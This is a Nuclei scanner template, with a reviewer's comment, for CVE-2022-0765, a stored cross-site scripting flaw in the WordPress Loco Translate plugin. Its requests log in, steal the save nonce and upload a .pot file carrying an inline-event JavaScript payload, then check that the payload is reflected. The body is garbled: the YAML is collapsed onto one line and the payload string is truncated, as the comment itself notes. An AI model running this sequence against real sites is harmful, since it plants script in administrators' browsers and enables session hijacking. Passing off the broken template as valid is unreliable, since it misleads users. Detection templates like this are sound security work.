# Nuclei template for CVE-2022-0765: WordPress Loco Translate < 2.6.1, stored
# cross-site scripting (CWE-79, CVSS 5.4, PR:L so it needs valid WP credentials).
# Flow (`flow: http(1) && http(2) && http(3)`):
#   http(1): POST /wp-login.php with {{username}}/{{password}}, then GET the
#            Loco file-edit page; matcher requires HTTP 200 and "loco-nonce" in
#            the body; the regex extractor pulls the `save` nonce from body_2
#            into {{nonce}}. Matcher and extractor are `internal: true`, so
#            nothing is reported from this step.
#   http(2): POST /wp-admin/admin-ajax.php (action=loco_json, route=save,
#            loco-nonce={{nonce}}) uploading a .pot whose `msgid` carries the
#            test string; matcher requires 200 and "POT file saved" (internal).
#   http(3): GET the file-edit page again and match on the reflected
#            `ontoggle=alert(document.domain)>` - the only reported result.
# NOTE(review): this copy arrived with its line breaks collapsed. The block
# scalars under `raw:` (HTTP requests and the multipart body) cannot be reliably
# re-indented from this view, and the uploaded `msgid` line appears truncated
# (`msgid "\">'>` is followed directly by `" msgstr ""`), so the text below is
# kept verbatim; re-fetch the original before running or editing it.
# `max-request: 4` counts the login, two editor GETs and the save POST.
id: CVE-2022-0765 info: name: WordPress Loco Translate < 2.6.1 - Cross-Site Scripting author: 0x_Akoko severity: medium description: | Loco Translate WordPress plugin before 2.6.1 contains a stored cross-site scripting vulnerability caused by improper removal of inline events from source translation strings, allowing authenticated users to inject arbitrary JavaScript payloads. impact: | Attackers can execute arbitrary JavaScript in the context of the admin panel, potentially leading to session hijacking or defacement. remediation: | Update to version 2.6.1 or later. reference: - https://wpscan.com/vulnerability/58838f51-323d-41e0-8c85-8e113dc2c587 - https://patchstack.com/database/vulnerability/loco-translate/wordpress-loco-translate-plugin-2-6-0-authenticated-stored-cross-site-scripting-xss-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2022-0765 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-0765 cwe-id: CWE-79 epss-score: 0.04013 epss-percentile: 0.89232 cpe: cpe:2.3:a:loco_translate_project:loco_translate:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 4 tags: cve,cve2022,wordpress,wp,wp-plugin,xss,loco-translate,authenticated flow: http(1) && http(2) && http(3) http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?path=plugins%2Floco-translate%2Flanguages%2Floco-translate.pot&bundle=loco-translate%2Floco.php&domain=loco-translate&page=loco-plugin&action=file-edit HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - status_code == 200 - contains(body, "loco-nonce") condition: and internal: true extractors: - type: regex name: nonce part: body_2 group: 1 regex: - '"save":"([a-f0-9]+)"' internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: 
multipart/form-data; boundary=----WebKitFormBoundaryXssTest X-Requested-With: XMLHttpRequest ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="locale" ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="path" plugins/loco-translate/languages/loco-translate.pot ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="bundle" plugin.loco-translate/loco.php ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="domain" loco-translate ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="po"; filename="undefined" Content-Type: application/x-gettext msgid "" msgstr "" "Project-Id-Version: Loco Translate\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" msgid "\">'>
" msgstr "" ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="action" loco_json ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="route" save ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="loco-nonce" {{nonce}} ------WebKitFormBoundaryXssTest-- matchers: - type: dsl dsl: - status_code == 200 - contains(body, "POT file saved") condition: and internal: true - raw: - | GET /wp-admin/admin.php?path=plugins%2Floco-translate%2Flanguages%2Floco-translate.pot&bundle=loco-translate%2Floco.php&domain=loco-translate&page=loco-plugin&action=file-edit HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - status_code == 200 - contains(body, "ontoggle=alert(document.domain)>") condition: and # digest: 490a004630440220097a72197bcda47c7a9bf072adee3e6f2742aef54d48251599d288919c6a69cf02205506f21280ccab11689ea506dce20c673be3beef3416e6b07c088aef034f8eeb:922c64590222798bb761d5b6d8e72950